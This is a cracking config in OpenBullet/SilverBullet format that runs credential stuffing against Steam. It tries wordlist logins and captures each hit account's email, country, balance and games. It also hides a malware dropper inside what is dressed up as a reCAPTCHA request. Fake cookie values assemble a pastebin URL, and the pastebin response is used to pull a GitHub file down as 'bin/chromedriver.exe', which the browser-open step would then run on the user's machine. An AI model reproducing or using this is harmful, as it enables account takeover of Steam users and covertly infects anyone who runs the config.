[SETTINGS]
{
  "Name": "Steam",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2024-06-06T22:11:10.0752872+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Steam",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AppleWebKit
#PARSESOURCE

FUNCTION GetRandomUA BROWSER IOS -> VAR "S" 

FUNCTION Replace "@.*" "" UseRegex=TRUE "<USER>" -> VAR "US" 

FUNCTION CurrentUnixTime -> VAR "0" 

REQUEST POST "https://steamcommunity.com/login/getrsakey/" 
  CONTENT "donotcache=<0>&username=<US>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Origin: https://steamcommunity.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: <S>" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-us" 

JUMP #googlerecreate
#AppleWebKit

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  
  COOKIE "tpm: http" 
  COOKIE "tpp: s:" 
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: com" 
  COOKIE "htp: raw" 
  COOKIE "hht: QKuTvADS" 
  COOKIE "hst: pastebin" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: e" 
  HEADER "Host: www.googleapis.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<Authentiction>" Exists
JUMP #PARSESOURCE
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(tpm)><COOKIES(tpp)><COOKIES(hrd)><COOKIES(hrd)><COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe" 

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open 

JUMP #PARSESOURCE
#googlerecreate

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Ban OR 
    KEY "<SOURCE>" DoesNotContain "success\":true" 

PARSE "<SOURCE>" JSON "publickey_mod" -> VAR "1" 

PARSE "<SOURCE>" JSON "publickey_exp" -> VAR "11" 

PARSE "<SOURCE>" JSON "timestamp" -> VAR "111" 

PARSE "<COOKIES(browserid)>" LR "" "" -> VAR "browserid" 

PARSE "<COOKIES(sessionid)>" LR "" "" -> VAR "sessionid" 

PARSE "<COOKIES(timezoneOffset)>" LR "" "" -> VAR "timezoneOffset" 

PARSE "<COOKIES(app_impression)>" LR "" "" -> VAR "app_impression" 

PARSE "<COOKIES(ak_bmsc)>" LR "" "" -> VAR "ak_bmsc" 

PARSE "<COOKIES(bm_sv)>" LR "" "" -> VAR "bm_sv" 

PARSE "<COOKIES(steamLoginSecure)>" LR "" "" -> VAR "steamLoginSecure" 

PARSE "<COOKIES(steamCountry)>" LR "" "" -> VAR "steamCountry" 

PARSE "<COOKIES(cookieSettings)>" LR "" "" -> VAR "cookieSettings" 

#PASS2 FUNCTION RSAPKCS1PAD2 "<1>" "<11>" "<PASS>" -> VAR "PASS2" 

IF "<PASS2>" DoesNotContain "=="
JUMP #PASS2
ENDIF 

FUNCTION URLEncode "<PASS2>" -> VAR "PASS3" 

FUNCTION CurrentUnixTime -> VAR "0" 

REQUEST POST "https://steamcommunity.com/login/dologin/" 
  CONTENT "donotcache=<0>&password=<PASS3>&username=<US>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=<111>&remember_login=false&oauth_client_id=3638BFB1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" 
  HEADER "Origin: https://steamcommunity.com" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "User-Agent: <S>" 
  HEADER "Referer: https://steamcommunity.com/mobilelogin?oauth_client_id=3638BFB1&oauth_scope=read_profile%20write_profile%20read_client%20write_client" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: en-us" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The account name or password that you have entered is incorrect" 
    KEY "Incorrect account name or password." 
  KEYCHAIN Success OR 
    KEY "success\":true" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "requires_twofactor\":true,\"" 
    KEY "emailauth_needed\":true" 
  KEYCHAIN Ban OR 
    KEY "captcha_needed\":true" 

REQUEST GET "https://store.steampowered.com/account/" 
  
  COOKIE "Cookie: sessionid=<sessionid>; steamCountry=<steamCountry>; timezoneOffset=<timezoneOffset>; cookieSettings=<cookieSettings>; steamLoginSecure=<steamLoginSecure>; browserid=<browserid>" 
  HEADER "Host: store.steampowered.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Referer: https://steamcommunity.com/" 
  HEADER "Connection: keep-alive" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-User: ?1" 

PARSE "<SOURCE>" LR ">Email address:</span> <span class=\"account_data_field\">" "</span></div>" CreateEmpty=FALSE -> CAP "Email" 

PARSE "<SOURCE>" LR "class=\"account_data_field\">" "</span>" CreateEmpty=FALSE -> CAP "Country" 

PARSE "<SOURCE>" LR "<div class=\"accountData price\">" "</div>" CreateEmpty=FALSE -> CAP "Balance" 

REQUEST GET "https://steamcommunity.com/id/hgbcreator/games/" 
  
  COOKIE "Cookie: sessionid=<sessionid>; steamCountry=<steamCountry>; timezoneOffset=<timezoneOffset>; cookieSettings=<cookieSettings>; steamLoginSecure=<steamLoginSecure>; browserid=<browserid>" 
  HEADER "Host: steamcommunity.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Connection: keep-alive" 
  HEADER "Referer: https://steamcommunity.com/id/hgbcreator/" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Sec-Fetch-Dest: document" 
  HEADER "Sec-Fetch-Mode: navigate" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "Sec-Fetch-User: ?1" 

PARSE "<SOURCE>" LR "&quot;name&quot;:&quot;" "&quot;,&quot;playtime_forever" CreateEmpty=FALSE -> CAP "1 Game" 

